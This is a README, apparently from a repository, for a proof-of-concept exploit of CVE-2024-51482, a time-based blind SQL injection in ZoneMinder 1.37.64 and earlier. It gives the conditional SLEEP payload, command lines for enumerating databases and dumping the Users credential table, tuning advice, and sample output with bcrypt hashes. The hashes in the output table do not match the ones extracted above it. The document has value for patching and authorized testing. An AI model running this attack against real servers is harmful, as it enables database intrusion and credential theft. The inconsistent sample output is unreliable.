CVE-2024-51482-PoC

Authenticated time-based blind SQL injection exploit for ZoneMinder v1.37. <= 1.37.64*

Overview

This is a proof-of-concept exploit for CVE-2024-51482, a time-based blind SQL injection vulnerability in ZoneMinder's event management functionality. The exploit requires authentication and uses conditional SLEEP queries to extract data from the database.

Features

• Authenticated exploitation - Login with credentials or session cookie Length detection - Binary search to find exact string length before extraction
• Parallel extraction - Multi-threaded character extraction for speed
• sqlmap-style options - Enumerate databases, tables, columns, and dump data
• Safe defaults - 3s delay, 5 threads for high accuracy
• Progress tracking - Real-time extraction progress with verbose mode
• Clean output - Formatted table display for dumped data

Requirements

pip install requests

Quick Start

Default Mode - Dump Credentials

python3 poc.py -t example.local -u admin -p password

With Session Cookie

python3 poc.py -t example.local --cookie 'ZMSESSID_value'

Verbose Mode

python3 poc.py -t example.local -u admin -p password -v

Usage

Enumerate Databases

python3 poc.py -t example.local -u admin -p password --dbs

Enumerate Tables

python3 poc.py -t example.local -u admin -p password -D zm --tables

Enumerate Columns

python3 poc.py -t example.local -u admin -p password -D zm -T Users --columns

Dump Specific Table

python3 poc.py -t example.local -u admin -p password -D zm -T Users --dump

Options

Required:
  -t, --target TARGET       Target URL (IP, hostname, or full URL)
  
Authentication:
  -u, --username USERNAME   Username for authentication
  -p, --password PASSWORD   Password for authentication
  --cookie COOKIE           Session cookie (ZMSESSID)

Enumeration:
  --dbs                     Enumerate databases
  -D, --database DATABASE   Database to use
  --tables                  Enumerate tables
  -T, --table TABLE         Table to use
  --columns                 Enumerate columns
  --dump                    Dump table data

Performance:
  --delay DELAY             Time delay in seconds (default: 3, safe)
  --threads THREADS         Number of threads (default: 5, safe)
  -v, --verbose             Show extraction progress

Performance Tuning

Safe Mode (Recommended)

python3 poc.py -t example.local -u admin -p password --delay 3 --threads 5

• Speed: ~2-3 minutes per password hash
• Accuracy: High

Fast Mode (May have errors)

python3 poc.py -t example.local -u admin -p password --delay 1 --threads 20

• Speed: ~30-60 seconds per password hash
• Accuracy: May produce incorrect characters

Example Output

[*] Target: http://example.local
[*] Delay: 3s | Threads: 5
[+] Authenticated as admin
[*] Testing vulnerability...
[+] Target is VULNERABLE!

[*] Default mode: Dumping zm.Users credentials...
[*] Dumping data from 'zm.Users'...
[+] Extracted: admin
[+] Extracted: $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm
[+] Extracted: john
[+] Extracted: $2y$10$prZGnazejKcaLq9bKNexXOglBSqOl1hq07LW7AJ/QNqZolbXKfFG.

====================================================================================
| Username   | Password                                                      |
====================================================================================
| admin      | $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm |
| john       | $2y$10$prABlsrtyjkiWv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. |
====================================================================================

[+] 2 entries dumped

How It Works

1. Authentication - Logs in with credentials or uses provided session cookie
2. Vulnerability Test - Confirms target is vulnerable with simple SLEEP payload
3. Length Detection - Uses binary search to find exact string length
4. Parallel Extraction - Extracts all character positions simultaneously
5. Data Display - Formats results in clean table

Payload Format

The exploit uses conditional SLEEP:

1 AND (SELECT 1 FROM (SELECT(SLEEP(3-(IF(condition,0,3)))))test)

• TRUE condition: No delay (0 seconds)
• FALSE condition: Full delay (3 seconds)

Troubleshooting

Inaccurate Results

If you get wrong characters (e.g., $ becomes 8):

# Increase delay and reduce threads
python3 poc.py -t example.local -u admin -p password --delay 4 --threads 3

Too Slow

If extraction is too slow:

# Decrease delay and increase threads (may reduce accuracy)
python3 poc.py -t example.local -u admin -p password --delay 2 --threads 10

No Data Found

If default zm.Users doesn't exist:

# Enumerate databases first
python3 poc.py -t example.local -u admin -p password --dbs

# Then enumerate tables
python3 poc.py -t example.local -u admin -p password -D database_name --tables

CVE Information

• CVE ID: CVE-2024-51482
• Affected Versions: ZoneMinder v1.37.* <= 1.37.64
• Fixed In: v1.37.65
• Vulnerability Type: Time-based Blind SQL Injection
• CVSS Score: TBD

Disclaimer

This tool is for educational and authorized security testing purposes only.

• Do not use this tool against systems you do not own or have explicit permission to test
• Unauthorized access to computer systems is illegal
• The author is not responsible for any misuse or damage caused by this tool
• Always obtain proper authorization before conducting security assessments

References

• NVD - CVE-2024-51482
• ZoneMinder GitHub

License

This project is provided for educational purposes only. Use responsibly and ethically.

---

⭐ If you find this useful, please star the repository!